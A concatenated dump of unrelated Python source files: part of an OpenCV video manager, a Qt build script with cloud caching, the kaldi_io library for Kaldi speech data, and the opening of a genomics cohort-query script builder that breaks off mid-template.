# so this variable is usefull to check it
self.stream_error = bool(ret)
# If it is a streaming we will try to reconnect
if self.is_stream and not ret:
exit = False
for i in range(ManagerCV2._tries_reconnect_stream):
ret, frame = self.video.read()
if ret:
break
if i+1 == ManagerCV2._tries_reconnect_stream:
self.stop_queue()
return
elif not ret:
self.stop_queue()
return
frame_hash = None
if self.detect_scenes:
frame_hash = imagehash.dhash(Image.fromarray(frame))
self.queue.put((frame,frame_hash))
queue_size = self.queue.qsize()
else:
# I want to wait until someone awake me
self.queue_awake.get()
def stop_queue(self):
self.stopped = True
self.queue.put((None,None))
def set_tracking(self, selector, frame):
self.selector_tracker = selector
self.trackers = []
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
height, width, _ = rgb_frame.shape
for selection in self.selector_tracker.zones:
if self.selector_tracker.normalized:
selection = (int(selection[0]*width),
int(selection[1]*height),
int(selection[2]*width),
int(selection[3]*height))
tracker = dlib.correlation_tracker()
tracker.start_track(rgb_frame, dlib.rectangle(*selection))
self.trackers.append(tracker)
def get_tracking(self, frame):
rgb_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
height, width, _ = rgb_frame.shape
for i, tracker in enumerate(self.trackers):
tracker.update(rgb_frame)
pos = tracker.get_position()
selection = (int(pos.left()),int(pos.top()), int(pos.right()), int(pos.bottom()))
if self.selector_tracker.normalized:
selection = (selection[0]/width,
selection[1]/height,
selection[2]/width,
selection[3]/height)
self.selector_tracker.zones[i] = selection
return self.selector_tracker
def set_ret_handler(self, method, *args, **kwargs):
""" Method to execute when finished Video/Stream
Arguments:
method -- Method to execute
args -- Arguments to pass to the method
kwargs -- Keyword argoments to pass to the method
"""
self.ret_handler = method
self.ret_handler_args = args
self.ret_handler_kwargs = kwargs
def add_keystroke(self, keystroke, wait_key, *args, exit=False):
""" Method to execute when pressed a key
Arguments:
keystroke -- Key to check if pressed
waitkey -- Ms to wait key (it works exactly as cv2.waitKey)
args -- Arguments to pass to the method
"""
self.__keystroke_dict['keystroke'].append(keystroke)
self.__keystroke_dict['wait_key'].append(wait_key)
self.__keystroke_dict['keystroke_args'].append(args)
if exit:
self.__keystroke_dict['exit_keystrokes'].append(keystroke)
def get_last_keystroke(self):
""" Check the last pressed keystroke (not neccesarily in the last frame)"""
return self.last_keystroke
def end_iteration(self):
""" Internal method to finish iteration, with the previous configuration"""
self.stopped = True
self.video.release()
if self.ret_handler:
self.ret_handler(*self.ret_handler_args, **self.ret_handler_kwargs)
raise StopIteration
def get_fps(self):
""" Get average FPS"""
return round(self.count_frames / (self.final_time - self.initial_time),3)
def is_error_last_frame(self):
""" If we lose the last frame it will return True eoc False (only usefull for streams)"""
return self.stream_error
|
build_qt.py
|
import subprocess as sp
import multiprocessing as mp
import os
import time
import tarfile
import argparse
import threading
import platform
import shutil
import hashlib
import blobfile as bf
from .common import run, GCS_BUCKET
BUILD_VERSION = 11
def cache_folder(name, dirpath, options, build_fn):
if os.path.exists(dirpath):
print(f"cache for {name} found locally")
return
options_hash = hashlib.md5("|".join(options).encode("utf8")).hexdigest()
cache_path = bf.join(f"gs://{GCS_BUCKET}", "cache", f"{name}-{options_hash}.tar")
if "GOOGLE_APPLICATION_CREDENTIALS" not in os.environ:
# we don't have any credentials to do the caching, always build in this case
print(f"building without cache for {name}")
start = time.time()
build_fn()
print(f"build elapsed {time.time() - start}")
elif bf.exists(cache_path):
print(f"downloading cache for {name}: {cache_path}")
start = time.time()
with bf.BlobFile(cache_path, "rb") as f:
with tarfile.open(fileobj=f, mode="r") as tf:
tf.extractall()
print(f"download elapsed {time.time() - start}")
else:
print(f"building cache for {name}")
start = time.time()
build_fn()
print(f"cache build elapsed {time.time() - start}")
print(f"uploading cache for {name}")
start = time.time()
if not bf.exists(cache_path):
with bf.BlobFile(cache_path, "wb") as f:
with tarfile.open(fileobj=f, mode="w") as tf:
tf.add(dirpath)
print(f"upload elapsed {time.time() - start}")
# workaround for timeout error
# https://docs.travis-ci.com/user/common-build-problems/#build-times-out-because-no-output-was-received
# since we may be running inside a docker image without the travis_wait command, do this manually
def no_timeout_worker():
while True:
time.sleep(60)
print(".")
def build_qt(output_dir):
no_timeout_thread = threading.Thread(target=no_timeout_worker, daemon=True)
no_timeout_thread.start()
qt_version = "5.13.2"
os.makedirs(output_dir, exist_ok=True)
os.chdir(output_dir)
os.makedirs("qt", exist_ok=True)
os.chdir("qt")
modules = ["qtbase"]
def download_source():
run("git clone https://code.qt.io/qt/qt5.git")
os.chdir("qt5")
run(f"git checkout v{qt_version}")
run("perl init-repository --module-subset=" + ",".join(modules))
os.chdir("..")
# downloading the source from git takes 25 minutes on travis
# so cache the source so we don't have to use git
cache_folder("qt-source", dirpath="qt5", options=[qt_version, platform.system()] + modules, build_fn=download_source)
qt_options = [
"-confirm-license",
"-static",
"-release",
# -qtnamespace should in theory reduce the likelihood of symbol conflicts
"-qtnamespace",
"ProcGenQt",
"-opensource",
"-nomake",
"examples",
"-nomake",
"tests",
"-nomake",
"tools",
# travis mac os x server does not seem to support avx2
"-no-avx2",
"-no-avx512",
# extra stuff we don't need
"-no-pch",
"-no-harfbuzz",
"-no-openssl",
"-no-dbus",
"-no-opengl",
"-no-xcb",
"-no-libjpeg",
"-no-ico",
"-no-gif",
# useful for profiling
# "-force-debug-info",
]
if platform.system() == "Windows":
# parallelize the windows build
qt_options.append("-mp")
def compile_qt():
os.makedirs("build")
os.chdir("build")
if platform.system() == "Windows":
qt_configure = "..\\qt5\\configure"
else:
qt_configure = "../qt5/configure"
run(f"{qt_configure} -prefix {os.getcwd()}/qtbase " + " ".join(qt_options))
if platform.system() == "Windows":
run("nmake", stdout=sp.PIPE, stderr=sp.STDOUT)
else:
run(f"make -j{mp.cpu_count()}", stdout=sp.PIPE, stderr=sp.STDOUT)
os.chdir("..")
run("du -hsc build")
for root, dirs, files in os.walk("."):
for dirname in dirs:
if dirname in (".obj", ".pch"):
dirpath = os.path.join(root, dirname)
print(f"remove dir {dirpath}")
shutil.rmtree(dirpath)
run("du -hsc build")
cache_folder("qt-build", dirpath="build", options=[platform.system(), os.environ.get("TRAVIS_OSX_IMAGE", "")] + qt_options, build_fn=compile_qt)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--output-dir", required=True)
args = parser.parse_args()
build_qt(args.output_dir)
if __name__ == "__main__":
main()
|
kaldi_io.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2014-2016 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License")
import numpy as np
import sys, os, re, gzip, struct
#################################################
# Adding kaldi tools to shell path,
# Select kaldi,
if not 'KALDI_ROOT' in os.environ:
# Default! To change run python with 'export KALDI_ROOT=/some_dir python'
os.environ['KALDI_ROOT']='/mnt/matylda5/iveselyk/Tools/kaldi-trunk'
# Add kaldi tools to path,
os.environ['PATH'] = os.popen('echo $KALDI_ROOT/src/bin:$KALDI_ROOT/tools/openfst/bin:$KALDI_ROOT/src/fstbin/:$KALDI_ROOT/src/gmmbin/:$KALDI_ROOT/src/featbin/:$KALDI_ROOT/src/lm/:$KALDI_ROOT/src/sgmmbin/:$KALDI_ROOT/src/sgmm2bin/:$KALDI_ROOT/src/fgmmbin/:$KALDI_ROOT/src/latbin/:$KALDI_ROOT/src/nnetbin:$KALDI_ROOT/src/nnet2bin:$KALDI_ROOT/src/nnet3bin:$KALDI_ROOT/src/online2bin/:$KALDI_ROOT/src/ivectorbin/:$KALDI_ROOT/src/lmbin/').readline().strip() + ':' + os.environ['PATH']
#################################################
# Define all custom exceptions,
class UnsupportedDataType(Exception): pass
class UnknownVectorHeader(Exception): pass
class UnknownMatrixHeader(Exception): pass
class BadSampleSize(Exception): pass
class BadInputFormat(Exception): pass
class SubprocessFailed(Exception): pass
#################################################
# Data-type independent helper functions,
def open_or_fd(file, mode='rb'):
""" fd = open_or_fd(file)
Open file, gzipped file, pipe, or forward the file-descriptor.
Eventually seeks in the 'file' argument contains ':offset' suffix.
"""
offset = None
try:
# strip 'ark:' prefix from r{x,w}filename (optional),
if re.search('^(ark|scp)(,scp|,b|,t|,n?f|,n?p|,b?o|,n?s|,n?cs)*:', file):
(prefix,file) = file.split(':',1)
# separate offset from filename (optional),
if re.search(':[0-9]+$', file):
(file,offset) = file.rsplit(':',1)
# input pipe?
if file[-1] == '|':
fd = popen(file[:-1], 'rb') # custom,
# output pipe?
elif file[0] == '|':
fd = popen(file[1:], 'wb') # custom,
# is it gzipped?
elif file.split('.')[-1] == 'gz':
fd = gzip.open(file, mode)
# a normal file...
else:
fd = open(file, mode)
except TypeError:
# 'file' is opened file descriptor,
fd = file
# Eventually seek to offset,
if offset != None: fd.seek(int(offset))
return fd
# based on '/usr/local/lib/python3.4/os.py'
def popen(cmd, mode="rb"):
if not isinstance(cmd, str):
raise TypeError("invalid cmd type (%s, expected string)" % type(cmd))
import subprocess, io, threading
# cleanup function for subprocesses,
def cleanup(proc, cmd):
ret = proc.wait()
if ret > 0:
raise SubprocessFailed('cmd %s returned %d !' % (cmd,ret))
return
# text-mode,
if mode == "r":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdout)
elif mode == "w":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return io.TextIOWrapper(proc.stdin)
# binary,
elif mode == "rb":
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdout
elif mode == "wb":
proc = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE)
threading.Thread(target=cleanup,args=(proc,cmd)).start() # clean-up thread,
return proc.stdin
# sanity,
else:
raise ValueError("invalid mode %s" % mode)
def read_key(fd):
""" [key] = read_key(fd)
Read the utterance-key from the opened ark/stream descriptor 'fd'.
"""
key = ''
while 1:
char = fd.read(1).decode("latin1")
if char == '' : break
if char == ' ' : break
key += char
key = key.strip()
if key == '': return None # end of file,
assert(re.match('^\S+$',key) != None) # check format (no whitespace!)
return key
#################################################
# Integer vectors (alignments, ...),
def read_ali_ark(file_or_fd):
""" Alias to 'read_vec_int_ark()' """
return read_vec_int_ark(file_or_fd)
def read_vec_int_ark(file_or_fd):
""" generator(key,vec) = read_vec_int_ark(file_or_fd)
Create generator of (key,vector<int>) tuples, which reads from the ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_int_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_int(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_int(file_or_fd):
""" [int-vec] = read_vec_int(file_or_fd)
Read kaldi integer vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Elements from int32 vector are sored in tuples: (sizeof(int32), value),
vec = np.frombuffer(fd.read(vec_size*5), dtype=[('size','int8'),('value','int32')], count=vec_size)
assert(vec[0]['size'] == 4) # int32 size,
ans = vec[:]['value'] # values are in 2nd column,
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=int)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_int(file_or_fd, v, key=''):
""" write_vec_int(f, v, key='')
Write a binary kaldi integer vector to filename or stream.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_int(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
ali = read_vec_flt(fd)
yield key, ali
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
# Data type,
header = fd.read(3).decode()
if header == 'FV ': sample_size = 4 # floats
elif header == 'DV ': sample_size = 8 # doubles
else: raise UnknownVectorHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimension,
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Mapping for percentiles in col-headers,
def uint16_to_float(value, min, range):
return np.float32(min + range * 1.52590218966964e-05 * value)
# Mapping for matrix elements,
def uint8_to_float_v2(vec, p0, p25, p75, p100):
# Split the vector by masks,
mask_0_64 = (vec <= 64);
mask_193_255 = (vec > 192);
mask_65_192 = (~(mask_0_64 | mask_193_255));
# Sanity check (useful but slow...),
# assert(len(vec) == np.sum(np.hstack([mask_0_64,mask_65_192,mask_193_255])))
# assert(len(vec) == np.sum(np.any([mask_0_64,mask_65_192,mask_193_255], axis=0)))
# Build the float vector,
ans = np.empty(len(vec), dtype='float32')
ans[mask_0_64] = p0 + (p25 - p0) / 64. * vec[mask_0_64]
ans[mask_65_192] = p25 + (p75 - p25) / 128. * (vec[mask_65_192] - 64)
ans[mask_193_255] = p75 + (p100 - p75) / 63. * (vec[mask_193_255] - 192)
return ans
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structed as [Colheader, ... , Colheader, Data, Data , .... ]
# { cols }{ size }
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.empty((cols,rows), dtype='float32')
for i, col_header in enumerate(col_headers):
col_header_flt = [ uint16_to_float(percentile, globmin, globrange) for percentile in col_header ]
mat[i] = uint8_to_float_v2(data[i], *col_header_flt)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename of opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is C++ type 'vector<vector<tuple<int,float> > >',
the outer-vector is usually time axis, inner-vector are the records
at given time, and the tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins at the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
using kaldi 'segments' file for 1 wav, format : '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end is in seconds,
- assumed 100 frames/second,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # segments with only 1 wav-file,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
|
coords_cohort_1_source_builder.py
|
#!/usr/bin/env python
"""
-------------
Copyright (c) 2015. Genome Research Ltd.
Author: Deciphering Development Disorders Project Team.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
---------------
"""
## Description = This script is not meant to be used directly by the user, it is however used inside the GUI.
## This script creates another python script called current_run.py that is executed on the server.
## It takes the user-defined parameters and puts them in the current_run.py template.
## This script embeds some function and class definitions found in parsing_setups.py
import os
import argparse
## the command line arguments
parser = argparse.ArgumentParser()
parser.add_argument('--o', type=str, default=None, help='The output path of current_run.py.')
parser.add_argument('--gui_path', type=str, default=None, help='The absolute path of the GUI.')
parser.add_argument('--remote_dir', type=str, default=None, help='The name of the remote temporary directory.')
parser.add_argument('--chrom', type=str, default=None, help='User-defined chromosome.')
parser.add_argument('--start', type=str, default=None, help='User-defined start.')
parser.add_argument('--stop', type=str, default=None, help='User-defined stop.')
parser.add_argument('--cq', type=str, default=None, help='User-defined comma-separated consequence.')
parser.add_argument('--max_af_cutoff', type=str, default=None, help='User-defined MAX AF cutoff.')
parser.add_argument('--max_af_value', type=str, default=None, help='User-defined MAX AF value.')
parser.add_argument('--string_user_settings_dict', type=str, default=None, help='User credentials.')
## prepare argument variables
args = parser.parse_args()
gui_path = args.gui_path
out = args.o
backend_dir = args.remote_dir
chrom = args.chrom
start = args.start
stop = args.stop
cq = args.cq
max_af_cutoff = args.max_af_cutoff
max_af_value = args.max_af_value
string_user_settings_dict = args.string_user_settings_dict
## the template of current_run.py in the form of a string
template = r"""
remote_dir = '{builder_backend_dir}'
import multiprocessing
import gzip
chrom = '{builder_chrom}'
start = '{builder_start}'
stop = '{builder_stop}'
cq = '{builder_cq}'
max_af_cutoff = '{builder_max_af_cutoff}'
max_af_value = '{builder_max_af_value}'
string_user_settings_dict = '{builder_string_user_settings_dict}'
user_settings_dict = {{}}
for i in string_user_settings_dict.split(';'):
temp = i.split(':')
user_settings_dict[temp[0]] = temp[1]
import json
json_dict = dict()
## The multiprocessing function.
def mp_func(a, b, chrom=chrom, start=start, stop=stop, cq_definitions=cq, max_af_cutoff=max_af_cutoff, max_af_value=max_af_value):
output_file_name = remote_dir + 'f_'+str(a)+'_'+str(b)+'.tsv.gz'
out = gzip.open(output_file_name, 'wb') ## open a compressed file used to write to
for tup in vcf_paths[a:b]:
person_id, person_vcf = tup
if (os.access(person_vcf, os.F_OK) and os.access(person_vcf, os.R_OK)):
vcf_generator = tabix_vcf(person_vcf, chrom, start, stop)
condition = True
while (condition):
my_rec = next(vcf_generator, False)
if (my_rec):
obj = Record(my_rec, cq_definitions, max_af_cutoff, max_af_value)
if (obj.validate_cq() and obj.validate_max_af_cutoff() and obj.validate_max_af_value()):
out.write('{{}}\t{{}}\n'.format(person_id, obj.get_variant_line()))
else:
condition = my_rec
out.close()
json_dict['error_msgs'] = ''
try:
cq_list = prepare_cq(cq)
get_all_current_vcfs_sql_statement = r"select person_stable_id,tmp_path from dataset where tmp_path like '%/vcfs/%uber%' and data_freeze_id = (select data_freeze_id from data_freeze where is_current = 't');"
